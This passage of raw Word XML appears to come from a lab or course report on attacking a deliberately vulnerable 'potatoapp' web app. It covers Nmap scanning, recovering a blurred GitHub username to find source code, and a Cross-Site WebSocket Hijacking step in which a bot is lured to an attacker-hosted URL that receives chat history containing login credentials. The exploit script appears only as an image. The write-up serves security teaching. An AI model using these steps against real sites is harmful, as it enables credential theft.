          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_38b65onrm4l2" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.1.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A potential threat actor can employ the Nmap (Network Mapper) tool to conduct a comprehensive scan of a target system or network, utilizing default scripts designed for service and vulnerability detection.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to perform:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Upon running nmap -sC, we observed that several ports are open, with particular attention to ports 80 (HTTP) and 443 (HTTPS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">
      <w:pPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="4572000" cy="2940424"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1" name="image17.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image17.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:srcRect b="0" l="6908" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="294042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2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> These findings indicate that our website is hosted on these ports. With this knowledge, potential attackers may begin their attacks on our website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3657600" cy="512064"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="38" name="image30.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image30.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:srcRect b="79510" l="0" r="44231" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3657600" cy="51206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00" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3657600" cy="512064"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="36" name="image56.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image56.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect b="0" l="0" r="17166" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3657600" cy="512064"/>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1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attackers can start performing their attacks on our website after discovering we are hosting them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_626eeunsain3" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.2. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Source Code Disclosure via OSINT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After accessing the web app, an attacker can locate the web application's source code on GitHub by uncovering a hidden username within a blue-tinted image found in a Facebook group post linked in our website's footer. Using an image-upscaling AI, the attacker reveals the obscured GitHub username and discovers the repository containing the code.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to perform, documented in: </w:t>
      </w:r>
      <w:hyperlink w:anchor="_nrae7na0y47g">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">3.2.2. - Source Code Disclosure via OSINT</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Find the Facebook group link in the web app's footer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scan through the posts and identify one with a blurred GitHub username image</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> To get a better view of the username, interpret the obscured username or use an image upscaler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Access GitHub to locate the username and discover the web app's source code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">An attacker could go through the codes and exploit vulnerabilities in the source code to carry out the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A3">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_j5we3bf1f6f" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Gaining User Role Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xvi17gah0000" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3.1.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Site WebSocket Hijacking</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-site WebSocket Hijacking is an attack that involves a cross-site request forgery (CSRF) attack on a WebSocket. It arises when the WebSocket handshake request relies solely on HTTP cookies for session handling and does not contain any CSRF tokens or other unpredictable values. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to perform, documented in: </w:t>
      </w:r>
      <w:hyperlink w:anchor="_uths4qpc5n42">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">3.3.1. - Cross-Site WebSocket Hijacking</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> In potatoapp/app.py we can see that there is a Bot that will request if the user posts content that starts with HTTP in the Live Chat feature. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> We can also see that we can trigger the WebSocket to send the chat history through the “/quote” WebSocket endpoint. However, the request needs to have a “websocketauth” cookie which can only be gotten if the request is made from ‘127.0.0.1’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> To exploit this, the attacker will have to create an exploit script such as the image below and host it from a publicly accessible URL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> In the Chat, enter `http://&lt;attacker-publically-accessible-url&gt;/` , this will trigger the Bot to click on the link resulting in the chat history being sent to the attacker's URL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> In the chat history, there is a username and password for the attacker to log in.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the attacker has acquired the credentials for the user role, they can log in and access a new section of the web application known as the "Our Potato Database." In this section, they can proceed with the next phase of the attack, which involves obtaining the credentials for the admin role.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AF">
      <w:pPr>
